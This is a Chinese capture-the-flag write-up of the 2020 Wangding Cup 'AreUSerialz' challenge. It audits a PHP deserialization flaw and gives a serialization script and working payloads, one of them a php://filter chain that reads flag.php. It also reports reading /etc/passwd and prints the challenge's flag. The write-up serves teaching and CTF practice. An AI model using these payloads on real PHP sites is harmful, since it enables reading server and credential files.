首页 > 其他分享 >[网鼎杯 2020 青龙组]AreUSerialz

[网鼎杯 2020 青龙组]AreUSerialz

时间:2024-11-11 11:44:06浏览次数:1  
标签:php AreUSerialz filename content flag 2020 output 网鼎杯 op

[网鼎杯 2020 青龙组]AreUSerialz

上来就是一份代码源文件,完整代码如下:

   <?php
  
  include("flag.php");
  
  highlight_file(__FILE__);
  
  class FileHandler {
  
      protected $op;
      protected $filename;
      protected $content;
  
      function __construct() {
          $op = "1";
          $filename = "/tmp/tmpfile";
          $content = "Hello World!";
          $this->process();
      }
  
      public function process() {
          if($this->op == "1") {
              $this->write();
          } else if($this->op == "2") {
              $res = $this->read();
              $this->output($res);
          } else {
              $this->output("Bad Hacker!");
          }
      }
  
      private function write() {
          if(isset($this->filename) && isset($this->content)) {
              if(strlen((string)$this->content) > 100) {
                  $this->output("Too long!");
                  die();
              }
              $res = file_put_contents($this->filename, $this->content);
              if($res) $this->output("Successful!");
              else $this->output("Failed!");
          } else {
              $this->output("Failed!");
          }
      }
  
      private function read() {
          $res = "";
          if(isset($this->filename)) {
              $res = file_get_contents($this->filename);
          }
          return $res;
      }
  
      private function output($s) {
          echo "[Result]: <br>";
          echo $s;
      }
  
      function __destruct() {
          if($this->op === "2")
              $this->op = "1";
          $this->content = "";
          $this->process();
      }
  
  }
  
  function is_valid($s) {
      for($i = 0; $i < strlen($s); $i++)
          if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
              return false;
      return true;
  }
  
  if(isset($_GET{'str'})) {
  
      $str = (string)$_GET['str'];
      if(is_valid($str)) {
          $obj = unserialize($str);
      }
  
  }

程序先检查GET请求中有没有一个叫str的参数,有则检查str变量,确保其每个字符ascii值都在32-125中,之后对变量str进行反序列化。
反序列化漏洞,我们直接找魔法函数,这里只有一个__destruct,继续审计代码。发现发现其在执行时会对op进行强类型比较,若其值为字符2,将其设置为字符1,将content属性重置为空,再调用process函数,观察process函数我们发现,其判断条件均为弱类型比较,且op为2时,调用read函数读取filename文件。到这里我们就有思路了。将op设置为数字2,filename设置为flag.php。对FileHandler进行序列化,传值给str。代码如下:
需要注意,protected属性序列化的格式是%00*%00属性名,这里限制str中不能含有不可见字符,所以需要将FileHandler属性都设置为public。这里其实利用了php7.1+版本对属性类型不敏感的漏洞。

  <?php
      class FileHandler {
          public $op = 2;
          public $filename = "flag.php";
          public $content;
      }
  
      $a = new FileHandler();
      $exp = serialize($a);
      echo $exp;
  ?>

得到序列化的值:O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}
直接输入payload,?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;},返回为空

但是将filename设置为/etc/passwd可以正常显示结果

所以这里存在一个坑,还有其他的waf拦了关键字flag,我们使用base64加密绕过。
将filename的值设置为php://filter/read=convert.base64-encode/resource=flag.php,再进行序列化得到:

  O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}

最后payload为?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}
最后得到flag的base64值

base64解密得到:
<?php $flag='flag{c906a37b-882d-47fc-8dd9-08668237e164}';
即flag为:flag{c906a37b-882d-47fc-8dd9-08668237e164}

标签:php,AreUSerialz,filename,content,flag,2020,output,网鼎杯,op
From: https://www.cnblogs.com/abenben/p/18539396

相关文章

  • Mac+win 2020版本Adobe AI Illustrator 2020中文激活安装包
    Illustrator2020是Adobe公司推出的一款领先的向量图形设计软件。它广泛应用于图标设计、印刷设计、标志设计及Web设计等领域,具备简便的使用方式和强大的功能。Illustrator2020的特色在于其灵活的向量编辑工具和高质量的图形库,以及与其他AdobeCreativeCloud应用程序的无缝互操......
  • [GYCTF2020]Blacklist
    题目链接:[GYCTF2020]Blacklist。打开环境后如下所示。尝试输入1,回显如下。输入'后发现存在报错。尝试使用联合注入,发现存在检测select等关键词。因此尝试下堆叠注入。首先是查询数据库。Payload:0'%3bshow+databases%3b%23。其次是查询当前数据库存在什么表。Pa......
  • [MRCTF2020]套娃
    打开靶机,先看源码<!--//1st$query=$_SERVER['QUERY_STRING'];if(substr_count($query,'_')!==0||substr_count($query,'%5f')!=0){die('Y0uareSocutE!');}if($_GET['b_u_p_t']!=='23333&#......
  • 【buuctf】[WUSTCTF2020]spaceclub
    小白的第七天,日常记录WP。flag奉上:wctf2020{h3re_1s_y0ur_fl@g_s1x_s1x_s1x}1.打开下载的附件发现里面有内容但是被隐藏了。2.使用Sublime_Text打开选中发现了一堆点。3.猜测是二进制数,将长的替换成1,短的替换成0。(先替换长的不然会将短的部分变为1)4.使用python脚本......
  • [NPUCTF2020]ReadlezPHP
    打开靶机,看看情况右键想看源代码没反应,关掉设置里的JavaScript即可查看源代码点进去看看发现源码<?php#error_reporting(0);classHelloPhp{public$a;public$b;publicfunction__construct(){$this->a="Y-m-dh:i:s";$this->b="d......
  • 网鼎杯2024 MISC04
    网鼎杯2024MISC04新知识:peano曲线下载文件是一个看起来特别无序的图片应该是经过了某种算法,但是我并没有见过,所以是看了wp是一种图像加密算法,需要把这个红线还原重组成二维码,搜索一个是这个Peano曲线fromPILimportImagefromtqdmimporttqdmdefpeano(n):ifn==......
  • 2024网鼎杯-初赛-青龙组
    初赛-青龙组题目附件下载:https://pan.baidu.com/s/1VbieB2XhNYtRqfBeLxguYw?pwd=c03iMiscmisc02​​生蚝:foremost分离,zsteg对最大的png,得到Y3p_Ke9_1s_?????搜7z找到压缩包,然后掩码爆破,得到flag.txt,然后写脚本爆破。得到字符串我们先用foremost分离题目给的flag,因......
  • [网鼎杯 2020 青龙组]AreUSerialz1
    今天做了一道比较有趣的反序列化题目([网鼎杯2020青龙组]AreUSerialz1),寻思着记录一下。先看源代码<?phpinclude("flag.php");highlight_file(__FILE__);classFileHandler{protected$op;protected$filename;protected$content;function__const......
  • SQL实战训练之,力扣:2020. 无流量的帐户数(递归)
    目录        一、力扣原题链接        二、题目描述        三、建表语句        四、题目分析                五、SQL解答        六、最终答案        七、验证        八、知识点一、......
  • [网鼎杯 2020 青龙组]AreUSerialz
    题目链接:[网鼎杯2020青龙组]AreUSerialz。打开后,环境如下所示。<?phpinclude("flag.php");highlight_file(__FILE__);classFileHandler{protected$op;protected$filename;protected$content;function__construct(){$op="1&......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99